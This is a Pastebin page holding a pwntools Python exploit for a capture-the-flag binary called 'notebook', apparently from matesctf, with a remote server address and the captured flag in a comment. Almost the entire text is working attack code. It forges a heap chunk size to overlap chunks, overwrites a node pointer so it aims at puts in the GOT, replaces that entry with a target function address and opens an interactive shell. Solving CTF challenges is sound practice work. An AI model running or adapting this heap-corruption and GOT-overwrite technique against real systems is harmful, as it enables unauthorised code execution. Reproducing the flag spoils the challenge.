SHARE
TWEET

notebook

finalshare Oct 6th, 2018 (edited) 130 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import sys
  2. import time
  3. from pwn import *
  4.  
  5. libc=ELF("./libc-2.27.so")
  6.  
  7. if len(sys.argv) >1:
  8.     flag=1
  9.     r = remote("125.235.240.172", 1337)
  10. else:
  11.     flag=0
  12.     r = process("./notebook",aslr=True)
  13.  
  14. def back():
  15.     r.sendafter('Delete\n','1')
  16. def next():
  17.     r.sendafter('Delete\n','2')
  18. def add(content):
  19.     r.sendafter('Delete\n','3')
  20.     sleep(0.25)
  21.     r.send(content)
  22.  
  23. def addbig(content):
  24.     r.sendafter('Delete\n','4')
  25.     sleep(0.25)
  26.     r.send(content)
  27. def edit(content):
  28.     r.sendafter('Delete\n','5')
  29.     sleep(0.25)
  30.     r.send(content)
  31. def delete():
  32.     r.sendafter('Delete\n','6')
  33.    
  34.  
  35. def main():
  36.     #malloc 5 chunk
  37.     log.info("A=Malloc 1000")
  38.     add("A")
  39.     log.info("B=Malloc 1000")
  40.     add("B")
  41.     log.info("C=Malloc 1000")
  42.     add("C")
  43.     log.info("D=Malloc 1000")
  44.     add("D")
  45.     log.info("E=Malloc 1000")
  46.     add("E")
  47.     log.info("Move currentNode to D")
  48.     back() #Move currentNode to D
  49.     log.info("Delete D")
  50.     log.info("To make sure the chunk 4 not concat with top chunk")
  51.     delete() #delete
  52.     log.info("Move currentNode to B")
  53.     back() #Move currentNode to B
  54.     log.info("Move currentNode to A")
  55.     back() #Move currentNode to A
  56.     log.info("Set size of B to (sizeB+sizeC+PrevInUse+8)")
  57.     log.info("Make sure fake free chunk has size > size the next malloc")
  58.     edit("A"*(992-8)+p64(2017))
  59.     log.info("Move currentNode to B")
  60.     next()
  61.     log.info("Delete B")
  62.     delete()
  63.     log.info("Move currentNode to C")
  64.     next()
  65.     log.info("Move currentNode to E")
  66.     next()
  67.     log.info("Next malloc will has B pointer so we can overflow the C")
  68.    
  69.     addbig("F"*(992-8)+p64(0x03f1)+p64(0x0601020  )+p64(0x601010)+"OVERFLOWED")
  70.    
  71.     log.success("C OVERFLOWED")
  72.     next()
  73.    
  74.     back()
  75.    
  76.     back()
  77.    
  78.     log.info("Now C->fd will point to puts@GOT.PLT")
  79.     next()
  80.    
  81.  
  82.     log.info("Write &canyouruneme to puts@GOT.PLT")
  83.     raw_input("Trigger?")
  84.     edit(p64(0x0400850))
  85.     r.recv()
  86.     log.success("Triggered.")
  87.     r.interactive()
  88.     #cat flag
  89.     #matesctf{i6lULX6Z86JHr5UI4MSP}
  90.    
  91.    
  92.    
  93. if __name__ == "__main__":
  94.     main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top